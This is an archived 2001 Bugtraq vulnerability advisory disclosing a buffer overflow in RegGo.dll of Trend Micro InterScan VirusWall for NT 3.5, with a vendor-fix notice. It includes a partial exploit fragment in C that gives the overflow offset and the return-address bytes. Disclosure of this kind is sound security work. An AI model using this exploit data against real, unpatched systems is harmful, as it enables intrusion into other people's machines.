[20706] in bugtraq
TrendMicro Interscan VirusWall RegGo.dll BOf
daemon@ATHENA.MIT.EDU (Nobuo Miwa)
Fri May 18 14:11:52 2001
To: BUGTRAQ@securityfocus.com
From: Nobuo Miwa <n-miwa@lac.co.jp>
Message-Id: <200105190215.AHG87031.BOX-JN@lac.co.jp>
Date: Sat, 19 May 2001 02:15:54 +0900
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Hi,
This is a Buffer Overflow vulneravility in Trend Micro
InterScan VirusWall for NT 3.5.
RegGo.dll is the one.
Following code is a peace of exploit program.
for ( j=0 ; j<820 ; j++ )
sploit[j]='a' ;
sploit[j++]=0xD5 ;
sploit[j++]=0x63 ;
sploit[j++]=0xF6 ;
sploit[j++]=0x77 ;
sploit[j++]=0xCC ; --> any code will be executed
I've already reported Trend Micro support team and they
will fix this issue in InterScan version 3.51 Build 1349.
<Nobuo Miwa> n-miwa@lac.co.jp ( @ @ ) http://www.lac.co.jp/security/
-------------------------------o00o--(. .)--o00o--------------------------
The moderator of BUGTRAQ-JP
